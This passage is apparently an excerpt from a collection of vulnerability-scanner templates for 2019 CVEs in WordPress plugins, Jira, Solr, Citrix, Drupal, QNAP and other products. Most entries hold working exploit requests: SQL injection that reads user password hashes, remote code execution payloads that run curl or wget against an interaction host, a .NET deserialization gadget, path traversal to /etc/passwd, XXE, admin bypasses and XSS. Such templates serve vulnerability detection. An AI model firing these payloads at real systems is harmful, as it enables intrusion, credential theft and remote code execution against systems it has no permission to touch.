F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: 